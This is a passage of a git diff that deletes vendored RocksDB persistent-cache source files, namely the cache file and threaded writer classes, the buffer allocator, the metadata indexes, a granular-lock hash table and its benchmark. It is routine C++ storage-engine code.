-  bool Read(const LBA& lba, Slice* key, Slice* block, char* scratch) override;
-
- private:
-  std::unique_ptr<RandomAccessFileReader> freader_;
-
- protected:
-  bool OpenImpl(const bool enable_direct_reads);
-  bool ParseRec(const LBA& lba, Slice* key, Slice* val, char* scratch);
-
-  std::shared_ptr<Logger> log_;  // log file
-};
-
-// class WriteableCacheFile
-//
-// All writes to the files are cached in buffers. The buffers are flushed to
-// disk as they get filled up. When file size reaches a certain size, a new file
-// will be created provided there is free space
-class WriteableCacheFile : public RandomAccessCacheFile {
- public:
-  explicit WriteableCacheFile(Env* const env, CacheWriteBufferAllocator* alloc,
-                              Writer* writer, const std::string& dir,
-                              const uint32_t cache_id, const uint32_t max_size,
-                              const std::shared_ptr<Logger>& log)
-      : RandomAccessCacheFile(env, dir, cache_id, log),
-        alloc_(alloc),
-        writer_(writer),
-        max_size_(max_size) {}
-
-  virtual ~WriteableCacheFile();
-
-  // create file on disk
-  bool Create(const bool enable_direct_writes, const bool enable_direct_reads);
-
-  // read data from logical file
-  bool Read(const LBA& lba, Slice* key, Slice* block, char* scratch) override {
-    ReadLock _(&rwlock_);
-    const bool closed = eof_ && bufs_.empty();
-    if (closed) {
-      // the file is closed, read from disk
-      return RandomAccessCacheFile::Read(lba, key, block, scratch);
-    }
-    // file is still being written, read from buffers
-    return ReadBuffer(lba, key, block, scratch);
-  }
-
-  // append data to end of file
-  bool Append(const Slice&, const Slice&, LBA* const) override;
-  // End-of-file
-  bool Eof() const { return eof_; }
-
- private:
-  friend class ThreadedWriter;
-
-  static const size_t kFileAlignmentSize = 4 * 1024;  // align file size
-
-  bool ReadBuffer(const LBA& lba, Slice* key, Slice* block, char* scratch);
-  bool ReadBuffer(const LBA& lba, char* data);
-  bool ExpandBuffer(const size_t size);
-  void DispatchBuffer();
-  void BufferWriteDone();
-  void CloseAndOpenForReading();
-  void ClearBuffers();
-  void Close();
-
-  // File layout in memory
-  //
-  // +------+------+------+------+------+------+
-  // | b0   | b1   | b2   | b3   | b4   | b5   |
-  // +------+------+------+------+------+------+
-  //        ^                           ^
-  //        |                           |
-  //      buf_doff_                   buf_woff_
-  //   (next buffer to           (next buffer to fill)
-  //   flush to disk)
-  //
-  //  The buffers are flushed to disk serially for a given file
-
-  CacheWriteBufferAllocator* const alloc_ = nullptr;  // Buffer provider
-  Writer* const writer_ = nullptr;                    // File writer thread
-  std::unique_ptr<WritableFile> file_;   // RocksDB Env file abstraction
-  std::vector<CacheWriteBuffer*> bufs_;  // Written buffers
-  uint32_t size_ = 0;                    // Size of the file
-  const uint32_t max_size_;              // Max size of the file
-  bool eof_ = false;                     // End of file
-  uint32_t disk_woff_ = 0;               // Offset to write on disk
-  size_t buf_woff_ = 0;                  // off into bufs_ to write
-  size_t buf_doff_ = 0;                  // off into bufs_ to dispatch
-  size_t pending_ios_ = 0;               // Number of ios to disk in-progress
-  bool enable_direct_reads_ = false;     // Should we enable direct reads
-                                         // when reading from disk
-};
-
-//
-// Abstraction to do writing to device. It is part of pipelined architecture.
-//
-class ThreadedWriter : public Writer {
- public:
-  // Representation of IO to device
-  struct IO {
-    explicit IO(const bool signal) : signal_(signal) {}
-    explicit IO(WritableFile* const file, CacheWriteBuffer* const buf,
-                const uint64_t file_off, const std::function<void()> callback)
-        : file_(file), buf_(buf), file_off_(file_off), callback_(callback) {}
-
-    IO(const IO&) = default;
-    IO& operator=(const IO&) = default;
-    size_t Size() const { return sizeof(IO); }
-
-    WritableFile* file_ = nullptr;           // File to write to
-    CacheWriteBuffer* const buf_ = nullptr;  // buffer to write
-    uint64_t file_off_ = 0;                  // file offset
-    bool signal_ = false;                    // signal to exit thread loop
-    std::function<void()> callback_;         // Callback on completion
-  };
-
-  explicit ThreadedWriter(PersistentCacheTier* const cache, const size_t qdepth,
-                          const size_t io_size);
-  virtual ~ThreadedWriter() { assert(threads_.empty()); }
-
-  void Stop() override;
-  void Write(WritableFile* const file, CacheWriteBuffer* buf,
-             const uint64_t file_off,
-             const std::function<void()> callback) override;
-
- private:
-  void ThreadMain();
-  void DispatchIO(const IO& io);
-
-  const size_t io_size_ = 0;
-  BoundedQueue<IO> q_;
-  std::vector<port::Thread> threads_;
-};
-
-}  // namespace rocksdb
-
-#endif
diff --git a/thirdparty/rocksdb/utilities/persistent_cache/block_cache_tier_file_buffer.h b/thirdparty/rocksdb/utilities/persistent_cache/block_cache_tier_file_buffer.h
deleted file mode 100644
index 9d9465c..0000000
--- a/thirdparty/rocksdb/utilities/persistent_cache/block_cache_tier_file_buffer.h
+++ /dev/null
@@ -1,127 +0,0 @@
-//  Copyright (c) 2013, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-#pragma once
-
-#include <list>
-#include <memory>
-#include <string>
-
-#include "include/rocksdb/comparator.h"
-#include "util/arena.h"
-#include "util/mutexlock.h"
-
-namespace rocksdb {
-
-//
-// CacheWriteBuffer
-//
-// Buffer abstraction that can be manipulated via append
-// (not thread safe)
-class CacheWriteBuffer {
- public:
-  explicit CacheWriteBuffer(const size_t size) : size_(size), pos_(0) {
-    buf_.reset(new char[size_]);
-    assert(!pos_);
-    assert(size_);
-  }
-
-  virtual ~CacheWriteBuffer() {}
-
-  void Append(const char* buf, const size_t size) {
-    assert(pos_ + size <= size_);
-    memcpy(buf_.get() + pos_, buf, size);
-    pos_ += size;
-    assert(pos_ <= size_);
-  }
-
-  void FillTrailingZeros() {
-    assert(pos_ <= size_);
-    memset(buf_.get() + pos_, '0', size_ - pos_);
-    pos_ = size_;
-  }
-
-  void Reset() { pos_ = 0; }
-  size_t Free() const { return size_ - pos_; }
-  size_t Capacity() const { return size_; }
-  size_t Used() const { return pos_; }
-  char* Data() const { return buf_.get(); }
-
- private:
-  std::unique_ptr<char[]> buf_;
-  const size_t size_;
-  size_t pos_;
-};
-
-//
-// CacheWriteBufferAllocator
-//
-// Buffer pool abstraction(not thread safe)
-//
-class CacheWriteBufferAllocator {
- public:
-  explicit CacheWriteBufferAllocator(const size_t buffer_size,
-                                     const size_t buffer_count)
-      : cond_empty_(&lock_), buffer_size_(buffer_size) {
-    MutexLock _(&lock_);
-    buffer_size_ = buffer_size;
-    for (uint32_t i = 0; i < buffer_count; i++) {
-      auto* buf = new CacheWriteBuffer(buffer_size_);
-      assert(buf);
-      if (buf) {
-        bufs_.push_back(buf);
-        cond_empty_.Signal();
-      }
-    }
-  }
-
-  virtual ~CacheWriteBufferAllocator() {
-    MutexLock _(&lock_);
-    assert(bufs_.size() * buffer_size_ == Capacity());
-    for (auto* buf : bufs_) {
-      delete buf;
-    }
-    bufs_.clear();
-  }
-
-  CacheWriteBuffer* Allocate() {
-    MutexLock _(&lock_);
-    if (bufs_.empty()) {
-      return nullptr;
-    }
-
-    assert(!bufs_.empty());
-    CacheWriteBuffer* const buf = bufs_.front();
-    bufs_.pop_front();
-    return buf;
-  }
-
-  void Deallocate(CacheWriteBuffer* const buf) {
-    assert(buf);
-    MutexLock _(&lock_);
-    buf->Reset();
-    bufs_.push_back(buf);
-    cond_empty_.Signal();
-  }
-
-  void WaitUntilUsable() {
-    // We are asked to wait till we have buffers available
-    MutexLock _(&lock_);
-    while (bufs_.empty()) {
-      cond_empty_.Wait();
-    }
-  }
-
-  size_t Capacity() const { return bufs_.size() * buffer_size_; }
-  size_t Free() const { return bufs_.size() * buffer_size_; }
-  size_t BufferSize() const { return buffer_size_; }
-
- private:
-  port::Mutex lock_;                   // Sync lock
-  port::CondVar cond_empty_;           // Condition var for empty buffers
-  size_t buffer_size_;                 // Size of each buffer
-  std::list<CacheWriteBuffer*> bufs_;  // Buffer stash
-};
-
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/utilities/persistent_cache/block_cache_tier_metadata.cc b/thirdparty/rocksdb/utilities/persistent_cache/block_cache_tier_metadata.cc
deleted file mode 100644
index 84d901b..0000000
--- a/thirdparty/rocksdb/utilities/persistent_cache/block_cache_tier_metadata.cc
+++ /dev/null
@@ -1,85 +0,0 @@
-//  Copyright (c) 2013, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-#ifndef ROCKSDB_LITE
-
-#include "utilities/persistent_cache/block_cache_tier_metadata.h"
-
-#include <functional>
-
-namespace rocksdb {
-
-bool BlockCacheTierMetadata::Insert(BlockCacheFile* file) {
-  return cache_file_index_.Insert(file);
-}
-
-BlockCacheFile* BlockCacheTierMetadata::Lookup(const uint32_t cache_id) {
-  BlockCacheFile* ret = nullptr;
-  BlockCacheFile lookup_key(cache_id);
-  bool ok = cache_file_index_.Find(&lookup_key, &ret);
-  if (ok) {
-    assert(ret->refs_);
-    return ret;
-  }
-  return nullptr;
-}
-
-BlockCacheFile* BlockCacheTierMetadata::Evict() {
-  using std::placeholders::_1;
-  auto fn = std::bind(&BlockCacheTierMetadata::RemoveAllKeys, this, _1);
-  return cache_file_index_.Evict(fn);
-}
-
-void BlockCacheTierMetadata::Clear() {
-  cache_file_index_.Clear([](BlockCacheFile* arg){ delete arg; });
-  block_index_.Clear([](BlockInfo* arg){ delete arg; });
-}
-
-BlockInfo* BlockCacheTierMetadata::Insert(const Slice& key, const LBA& lba) {
-  std::unique_ptr<BlockInfo> binfo(new BlockInfo(key, lba));
-  if (!block_index_.Insert(binfo.get())) {
-    return nullptr;
-  }
-  return binfo.release();
-}
-
-bool BlockCacheTierMetadata::Lookup(const Slice& key, LBA* lba) {
-  BlockInfo lookup_key(key);
-  BlockInfo* block;
-  port::RWMutex* rlock = nullptr;
-  if (!block_index_.Find(&lookup_key, &block, &rlock)) {
-    return false;
-  }
-
-  ReadUnlock _(rlock);
-  assert(block->key_ == key.ToString());
-  if (lba) {
-    *lba = block->lba_;
-  }
-  return true;
-}
-
-BlockInfo* BlockCacheTierMetadata::Remove(const Slice& key) {
-  BlockInfo lookup_key(key);
-  BlockInfo* binfo = nullptr;
-  bool ok __attribute__((__unused__)) = block_index_.Erase(&lookup_key, &binfo);
-  assert(ok);
-  return binfo;
-}
-
-void BlockCacheTierMetadata::RemoveAllKeys(BlockCacheFile* f) {
-  for (BlockInfo* binfo : f->block_infos()) {
-    BlockInfo* tmp = nullptr;
-    bool status = block_index_.Erase(binfo, &tmp);
-    (void)status;
-    assert(status);
-    assert(tmp == binfo);
-    delete binfo;
-  }
-  f->block_infos().clear();
-}
-
-}  // namespace rocksdb
-
-#endif
diff --git a/thirdparty/rocksdb/utilities/persistent_cache/block_cache_tier_metadata.h b/thirdparty/rocksdb/utilities/persistent_cache/block_cache_tier_metadata.h
deleted file mode 100644
index 14082bb..0000000
--- a/thirdparty/rocksdb/utilities/persistent_cache/block_cache_tier_metadata.h
+++ /dev/null
@@ -1,125 +0,0 @@
-//  Copyright (c) 2013, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-#pragma once
-
-#ifndef ROCKSDB_LITE
-
-#include <functional>
-#include <string>
-#include <unordered_map>
-
-#include "rocksdb/slice.h"
-
-#include "utilities/persistent_cache/block_cache_tier_file.h"
-#include "utilities/persistent_cache/hash_table.h"
-#include "utilities/persistent_cache/hash_table_evictable.h"
-#include "utilities/persistent_cache/lrulist.h"
-
-namespace rocksdb {
-
-//
-// Block Cache Tier Metadata
-//
-// The BlockCacheTierMetadata holds all the metadata associated with block
-// cache. It
-// fundamentally contains 2 indexes and an LRU.
-//
-// Block Cache Index
-//
-// This is a forward index that maps a given key to a LBA (Logical Block
-// Address). LBA is a disk pointer that points to a record on the cache.
-//
-// LBA = { cache-id, offset, size }
-//
-// Cache File Index
-//
-// This is a forward index that maps a given cache-id to a cache file object.
-// Typically you would lookup using LBA and use the object to read or write
-struct BlockInfo {
-  explicit BlockInfo(const Slice& key, const LBA& lba = LBA())
-      : key_(key.ToString()), lba_(lba) {}
-
-  std::string key_;
-  LBA lba_;
-};
-
-class BlockCacheTierMetadata {
- public:
-  explicit BlockCacheTierMetadata(const uint32_t blocks_capacity = 1024 * 1024,
-                                  const uint32_t cachefile_capacity = 10 * 1024)
-      : cache_file_index_(cachefile_capacity), block_index_(blocks_capacity) {}
-
-  virtual ~BlockCacheTierMetadata() {}
-
-  // Insert a given cache file
-  bool Insert(BlockCacheFile* file);
-
-  // Lookup cache file based on cache_id
-  BlockCacheFile* Lookup(const uint32_t cache_id);
-
-  // Insert block information to block index
-  BlockInfo* Insert(const Slice& key, const LBA& lba);
-  // bool Insert(BlockInfo* binfo);
-
-  // Lookup block information from block index
-  bool Lookup(const Slice& key, LBA* lba);
-
-  // Remove a given from the block index
-  BlockInfo* Remove(const Slice& key);
-
-  // Find and evict a cache file using LRU policy
-  BlockCacheFile* Evict();
-
-  // Clear the metadata contents
-  virtual void Clear();
-
- protected:
-  // Remove all block information from a given file
-  virtual void RemoveAllKeys(BlockCacheFile* file);
-
- private:
-  // Cache file index definition
-  //
-  // cache-id => BlockCacheFile
-  struct BlockCacheFileHash {
-    uint64_t operator()(const BlockCacheFile* rec) {
-      return std::hash<uint32_t>()(rec->cacheid());
-    }
-  };
-
-  struct BlockCacheFileEqual {
-    uint64_t operator()(const BlockCacheFile* lhs, const BlockCacheFile* rhs) {
-      return lhs->cacheid() == rhs->cacheid();
-    }
-  };
-
-  typedef EvictableHashTable<BlockCacheFile, BlockCacheFileHash,
-                             BlockCacheFileEqual>
-      CacheFileIndexType;
-
-  // Block Lookup Index
-  //
-  // key => LBA
-  struct Hash {
-    size_t operator()(BlockInfo* node) const {
-      return std::hash<std::string>()(node->key_);
-    }
-  };
-
-  struct Equal {
-    size_t operator()(BlockInfo* lhs, BlockInfo* rhs) const {
-      return lhs->key_ == rhs->key_;
-    }
-  };
-
-  typedef HashTable<BlockInfo*, Hash, Equal> BlockIndexType;
-
-  CacheFileIndexType cache_file_index_;
-  BlockIndexType block_index_;
-};
-
-}  // namespace rocksdb
-
-#endif
diff --git a/thirdparty/rocksdb/utilities/persistent_cache/hash_table.h b/thirdparty/rocksdb/utilities/persistent_cache/hash_table.h
deleted file mode 100644
index 36d8327..0000000
--- a/thirdparty/rocksdb/utilities/persistent_cache/hash_table.h
+++ /dev/null
@@ -1,238 +0,0 @@
-//  Copyright (c) 2013, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-#pragma once
-
-#ifndef ROCKSDB_LITE
-
-#include <assert.h>
-#include <list>
-#include <vector>
-
-#ifdef OS_LINUX
-#include <sys/mman.h>
-#endif
-
-#include "include/rocksdb/env.h"
-#include "util/mutexlock.h"
-
-namespace rocksdb {
-
-// HashTable<T, Hash, Equal>
-//
-// Traditional implementation of hash table with synchronization built on top
-// don't perform very well in multi-core scenarios. This is an implementation
-// designed for multi-core scenarios with high lock contention.
-//
-//                         |<-------- alpha ------------->|
-//               Buckets   Collision list
-//          ---- +----+    +---+---+--- ...... ---+---+---+
-//         /     |    |--->|   |   |              |   |   |
-//        /      +----+    +---+---+--- ...... ---+---+---+
-//       /       |    |
-// Locks/        +----+
-// +--+/         .    .
-// |  |          .    .
-// +--+          .    .
-// |  |          .    .
-// +--+          .    .
-// |  |          .    .
-// +--+          .    .
-//     \         +----+
-//      \        |    |
-//       \       +----+
-//        \      |    |
-//         \---- +----+
-//
-// The lock contention is spread over an array of locks. This helps improve
-// concurrent access. The spine is designed for a certain capacity and load
-// factor. When the capacity planning is done correctly we can expect
-// O(load_factor = 1) insert, access and remove time.
-//
-// Micro benchmark on debug build gives about .5 Million/sec rate of insert,
-// erase and lookup in parallel (total of about 1.5 Million ops/sec). If the
-// blocks were of 4K, the hash table can support  a virtual throughput of
-// 6 GB/s.
-//
-// T      Object type (contains both key and value)
-// Hash   Function that returns an hash from type T
-// Equal  Returns if two objects are equal
-//        (We need explicit equal for pointer type)
-//
-template <class T, class Hash, class Equal>
-class HashTable {
- public:
-  explicit HashTable(const size_t capacity = 1024 * 1024,
-                     const float load_factor = 2.0, const uint32_t nlocks = 256)
-      : nbuckets_(
-            static_cast<uint32_t>(load_factor ? capacity / load_factor : 0)),
-        nlocks_(nlocks) {
-    // pre-conditions
-    assert(capacity);
-    assert(load_factor);
-    assert(nbuckets_);
-    assert(nlocks_);
-
-    buckets_.reset(new Bucket[nbuckets_]);
-#ifdef OS_LINUX
-    mlock(buckets_.get(), nbuckets_ * sizeof(Bucket));
-#endif
-
-    // initialize locks
-    locks_.reset(new port::RWMutex[nlocks_]);
-#ifdef OS_LINUX
-    mlock(locks_.get(), nlocks_ * sizeof(port::RWMutex));
-#endif
-
-    // post-conditions
-    assert(buckets_);
-    assert(locks_);
-  }
-
-  virtual ~HashTable() { AssertEmptyBuckets(); }
-
-  //
-  // Insert given record to hash table
-  //
-  bool Insert(const T& t) {
-    const uint64_t h = Hash()(t);
-    const uint32_t bucket_idx = h % nbuckets_;
-    const uint32_t lock_idx = bucket_idx % nlocks_;
-
-    WriteLock _(&locks_[lock_idx]);
-    auto& bucket = buckets_[bucket_idx];
-    return Insert(&bucket, t);
-  }
-
-  // Lookup hash table
-  //
-  // Please note that read lock should be held by the caller. This is because
-  // the caller owns the data, and should hold the read lock as long as he
-  // operates on the data.
-  bool Find(const T& t, T* ret, port::RWMutex** ret_lock) {
-    const uint64_t h = Hash()(t);
-    const uint32_t bucket_idx = h % nbuckets_;
-    const uint32_t lock_idx = bucket_idx % nlocks_;
-
-    port::RWMutex& lock = locks_[lock_idx];
-    lock.ReadLock();
-
-    auto& bucket = buckets_[bucket_idx];
-    if (Find(&bucket, t, ret)) {
-      *ret_lock = &lock;
-      return true;
-    }
-
-    lock.ReadUnlock();
-    return false;
-  }
-
-  //
-  // Erase a given key from the hash table
-  //
-  bool Erase(const T& t, T* ret) {
-    const uint64_t h = Hash()(t);
-    const uint32_t bucket_idx = h % nbuckets_;
-    const uint32_t lock_idx = bucket_idx % nlocks_;
-
-    WriteLock _(&locks_[lock_idx]);
-
-    auto& bucket = buckets_[bucket_idx];
-    return Erase(&bucket, t, ret);
-  }
-
-  // Fetch the mutex associated with a key
-  // This call is used to hold the lock for a given data for extended period of
-  // time.
-  port::RWMutex* GetMutex(const T& t) {
-    const uint64_t h = Hash()(t);
-    const uint32_t bucket_idx = h % nbuckets_;
-    const uint32_t lock_idx = bucket_idx % nlocks_;
-
-    return &locks_[lock_idx];
-  }
-
-  void Clear(void (*fn)(T)) {
-    for (uint32_t i = 0; i < nbuckets_; ++i) {
-      const uint32_t lock_idx = i % nlocks_;
-      WriteLock _(&locks_[lock_idx]);
-      for (auto& t : buckets_[i].list_) {
-        (*fn)(t);
-      }
-      buckets_[i].list_.clear();
-    }
-  }
-
- protected:
-  // Models bucket of keys that hash to the same bucket number
-  struct Bucket {
-    std::list<T> list_;
-  };
-
-  // Substitute for std::find with custom comparator operator
-  typename std::list<T>::iterator Find(std::list<T>* list, const T& t) {
-    for (auto it = list->begin(); it != list->end(); ++it) {
-      if (Equal()(*it, t)) {
-        return it;
-      }
-    }
-    return list->end();
-  }
-
-  bool Insert(Bucket* bucket, const T& t) {
-    // Check if the key already exists
-    auto it = Find(&bucket->list_, t);
-    if (it != bucket->list_.end()) {
-      return false;
-    }
-
-    // insert to bucket
-    bucket->list_.push_back(t);
-    return true;
-  }
-
-  bool Find(Bucket* bucket, const T& t, T* ret) {
-    auto it = Find(&bucket->list_, t);
-    if (it != bucket->list_.end()) {
-      if (ret) {
-        *ret = *it;
-      }
-      return true;
-    }
-    return false;
-  }
-
-  bool Erase(Bucket* bucket, const T& t, T* ret) {
-    auto it = Find(&bucket->list_, t);
-    if (it != bucket->list_.end()) {
-      if (ret) {
-        *ret = *it;
-      }
-
-      bucket->list_.erase(it);
-      return true;
-    }
-    return false;
-  }
-
-  // assert that all buckets are empty
-  void AssertEmptyBuckets() {
-#ifndef NDEBUG
-    for (size_t i = 0; i < nbuckets_; ++i) {
-      WriteLock _(&locks_[i % nlocks_]);
-      assert(buckets_[i].list_.empty());
-    }
-#endif
-  }
-
-  const uint32_t nbuckets_;                 // No. of buckets in the spine
-  std::unique_ptr<Bucket[]> buckets_;       // Spine of the hash buckets
-  const uint32_t nlocks_;                   // No. of locks
-  std::unique_ptr<port::RWMutex[]> locks_;  // Granular locks
-};
-
-}  // namespace rocksdb
-
-#endif
diff --git a/thirdparty/rocksdb/utilities/persistent_cache/hash_table_bench.cc b/thirdparty/rocksdb/utilities/persistent_cache/hash_table_bench.cc
deleted file mode 100644
index 65bcd77..0000000
--- a/thirdparty/rocksdb/utilities/persistent_cache/hash_table_bench.cc
+++ /dev/null
@@ -1,303 +0,0 @@
-//  Copyright (c) 2013, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-
-#if !defined(OS_WIN) && !defined(ROCKSDB_LITE)
-
-#ifndef GFLAGS
-#include <cstdio>
-int main() { fprintf(stderr, "Please install gflags to run tools\n"); }
-#else
-#include <gflags/gflags.h>
-
-#include <atomic>
-#include <functional>
-#include <string>
-#include <unordered_map>
-
-#include "port/port_posix.h"
-#include "rocksdb/env.h"
-#include "util/mutexlock.h"
-#include "utilities/persistent_cache/hash_table.h"
-
-using std::string;
-
-DEFINE_int32(nsec, 10, "nsec");
-DEFINE_int32(nthread_write, 1, "insert %");
-DEFINE_int32(nthread_read, 1, "lookup %");
-DEFINE_int32(nthread_erase, 1, "erase %");
-
-namespace rocksdb {
-
-//
-// HashTableImpl interface
-//
-// Abstraction of a hash table implementation
-template <class Key, class Value>
-class HashTableImpl {
- public:
-  virtual ~HashTableImpl() {}
-
-  virtual bool Insert(const Key& key, const Value& val) = 0;
-  virtual bool Erase(const Key& key) = 0;
-  virtual bool Lookup(const Key& key, Value* val) = 0;
-};
-
-// HashTableBenchmark
-//
-// Abstraction to test a given hash table implementation. The test mostly
-// focus on insert, lookup and erase. The test can operate in test mode and
-// benchmark mode.
-class HashTableBenchmark {
- public:
-  explicit HashTableBenchmark(HashTableImpl<size_t, std::string>* impl,
-                              const size_t sec = 10,
-                              const size_t nthread_write = 1,
-                              const size_t nthread_read = 1,
-                              const size_t nthread_erase = 1)
-      : impl_(impl),
-        sec_(sec),
-        ninserts_(0),
-        nreads_(0),
-        nerases_(0),
-        nerases_failed_(0),
-        quit_(false) {
-    Prepop();
-
-    StartThreads(nthread_write, WriteMain);
-    StartThreads(nthread_read, ReadMain);
-    StartThreads(nthread_erase, EraseMain);
-
-    uint64_t start = NowInMillSec();
-    while (!quit_) {
-      quit_ = NowInMillSec() - start > sec_ * 1000;
-      /* sleep override */ sleep(1);
-    }
-
-    Env* env = Env::Default();
-    env->WaitForJoin();
-
-    if (sec_) {
-      printf("Result \n");
-      printf("====== \n");
-      printf("insert/sec = %f \n", ninserts_ / static_cast<double>(sec_));
-      printf("read/sec = %f \n", nreads_ / static_cast<double>(sec_));
-      printf("erases/sec = %f \n", nerases_ / static_cast<double>(sec_));
-      const uint64_t ops = ninserts_ + nreads_ + nerases_;
-      printf("ops/sec = %f \n", ops / static_cast<double>(sec_));
-      printf("erase fail = %d (%f%%)\n", static_cast<int>(nerases_failed_),
-             static_cast<float>(nerases_failed_ / nerases_ * 100));
-      printf("====== \n");
-    }
-  }
-
-  void RunWrite() {
-    while (!quit_) {
-      size_t k = insert_key_++;
-      std::string tmp(1000, k % 255);
-      bool status = impl_->Insert(k, tmp);
-      assert(status);
-      ninserts_++;
-    }
-  }
-
-  void RunRead() {
-    Random64 rgen(time(nullptr));
-    while (!quit_) {
-      std::string s;
-      size_t k = rgen.Next() % max_prepop_key;
-      bool status = impl_->Lookup(k, &s);
-      assert(status);
-      assert(s == std::string(1000, k % 255));
-      nreads_++;
-    }
-  }
-
-  void RunErase() {
-    while (!quit_) {
-      size_t k = erase_key_++;
-      bool status = impl_->Erase(k);
-      nerases_failed_ += !status;
-      nerases_++;
-    }
-  }
-
- private:
-  // Start threads for a given function
-  void StartThreads(const size_t n, void (*fn)(void*)) {
-    Env* env = Env::Default();
-    for (size_t i = 0; i < n; ++i) {
-      env->StartThread(fn, this);
-    }
-  }
-
-  // Prepop the hash table with 1M keys
-  void Prepop() {
-    for (size_t i = 0; i < max_prepop_key; ++i) {
-      bool status = impl_->Insert(i, std::string(1000, i % 255));
-      assert(status);
-    }
-
-    erase_key_ = insert_key_ = max_prepop_key;
-
-    for (size_t i = 0; i < 10 * max_prepop_key; ++i) {
-      bool status = impl_->Insert(insert_key_++, std::string(1000, 'x'));
-      assert(status);
-    }
-  }
-
-  static uint64_t NowInMillSec() {
-    timeval tv;
-    gettimeofday(&tv, /*tz=*/nullptr);
-    return tv.tv_sec * 1000 + tv.tv_usec / 1000;
-  }
-
-  //
-  //  Wrapper functions for thread entry
-  //
-  static void WriteMain(void* args) {
-    reinterpret_cast<HashTableBenchmark*>(args)->RunWrite();
-  }
-
-  static void ReadMain(void* args) {
-    reinterpret_cast<HashTableBenchmark*>(args)->RunRead();
-  }
-
-  static void EraseMain(void* args) {
-    reinterpret_cast<HashTableBenchmark*>(args)->RunErase();
-  }
-
-  HashTableImpl<size_t, std::string>* impl_;         // Implementation to test
-  const size_t sec_;                                 // Test time
-  const size_t max_prepop_key = 1ULL * 1024 * 1024;  // Max prepop key
-  std::atomic<size_t> insert_key_;                   // Last inserted key
-  std::atomic<size_t> erase_key_;                    // Erase key
-  std::atomic<size_t> ninserts_;                     // Number of inserts
-  std::atomic<size_t> nreads_;                       // Number of reads
-  std::atomic<size_t> nerases_;                      // Number of erases
-  std::atomic<size_t> nerases_failed_;               // Number of erases failed
-  bool quit_;  // Should the threads quit ?
-};
-
-//
-// SimpleImpl
-// Lock safe unordered_map implementation
-class SimpleImpl : public HashTableImpl<size_t, string> {
- public:
-  bool Insert(const size_t& key, const string& val) override {
-    WriteLock _(&rwlock_);
-    map_.insert(make_pair(key, val));
-    return true;
-  }
-
-  bool Erase(const size_t& key) override {
-    WriteLock _(&rwlock_);
-    auto it = map_.find(key);
-    if (it == map_.end()) {
-      return false;
-    }
-    map_.erase(it);
-    return true;
-  }
-
-  bool Lookup(const size_t& key, string* val) override {
-    ReadLock _(&rwlock_);
-    auto it = map_.find(key);
-    if (it != map_.end()) {
-      *val = it->second;
-    }
-    return it != map_.end();
-  }
-
- private:
-  port::RWMutex rwlock_;
-  std::unordered_map<size_t, string> map_;
-};
-
-//
-// GranularLockImpl
-// Thread safe custom RocksDB implementation of hash table with granular
-// locking
-class GranularLockImpl : public HashTableImpl<size_t, string> {
- public:
-  bool Insert(const size_t& key, const string& val) override {
-    Node n(key, val);
-    return impl_.Insert(n);
-  }
-
-  bool Erase(const size_t& key) override {
-    Node n(key, string());
-    return impl_.Erase(n, nullptr);
-  }
-
-  bool Lookup(const size_t& key, string* val) override {
-    Node n(key, string());
-    port::RWMutex* rlock;
-    bool status = impl_.Find(n, &n, &rlock);
-    if (status) {
-      ReadUnlock _(rlock);
-      *val = n.val_;
-    }
-    return status;
-  }
-
- private:
-  struct Node {
-    explicit Node(const size_t key, const string& val) : key_(key), val_(val) {}
-
-    size_t key_ = 0;
-    string val_;
-  };
-
-  struct Hash {
-    uint64_t operator()(const Node& node) {
-      return std::hash<uint64_t>()(node.key_);
-    }
-  };
-
-  struct Equal {
-    bool operator()(const Node& lhs, const Node& rhs) {
-      return lhs.key_ == rhs.key_;
-    }
-  };
-
-  HashTable<Node, Hash, Equal> impl_;
-};
-
-}  // namespace rocksdb
-
-//
-// main
-//
-int main(int argc, char** argv) {
-  GFLAGS::SetUsageMessage(std::string("\nUSAGE:\n") + std::string(argv[0]) +
-                          " [OPTIONS]...");
-  GFLAGS::ParseCommandLineFlags(&argc, &argv, false);
-
-  //
-  // Micro benchmark unordered_map
-  //
-  printf("Micro benchmarking std::unordered_map \n");
-  {
-    rocksdb::SimpleImpl impl;
-    rocksdb::HashTableBenchmark _(&impl, FLAGS_nsec, FLAGS_nthread_write,
-                                  FLAGS_nthread_read, FLAGS_nthread_erase);
-  }
-  //
-  // Micro benchmark scalable hash table
-  //
-  printf("Micro benchmarking scalable hash map \n");
-  {
-    rocksdb::GranularLockImpl impl;
-    rocksdb::HashTableBenchmark _(&impl, FLAGS_nsec, FLAGS_nthread_write,
-                                  FLAGS_nthread_read, FLAGS_nthread_erase);
-  }
-
-  return 0;
-}
-#endif  // #ifndef GFLAGS
-#else
-int main(int /*argc*/, char** /*argv*/) { return 0; }
-#endif
diff --git a/thirdparty/rocksdb/utilities/persistent_cache/hash_table_evictable.h b/thirdparty/rocksdb/utilities/persistent_cache/hash_table_evictable.h
deleted file mode 100644
index 6557eb4..0000000
--- a/thirdparty/rocksdb/utilities/persistent_cache/hash_table_evictable.h
+++ /dev/null
@@ -1,168 +0,0 @@
-//  Copyright (c) 2013, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-#pragma once
-
-#ifndef ROCKSDB_LITE
-
-#include <functional>
-
-#include "util/random.h"
-#include "utilities/persistent_cache/hash_table.h"
-#include "utilities/persistent_cache/lrulist.h"
-
-namespace rocksdb {
-
-// Evictable Hash Table
-//
-// Hash table index where least accessed (or one of the least accessed) elements
-// can be evicted.
-//
-// Please note EvictableHashTable can only be created for pointer type objects
-template <class T, class Hash, class Equal>
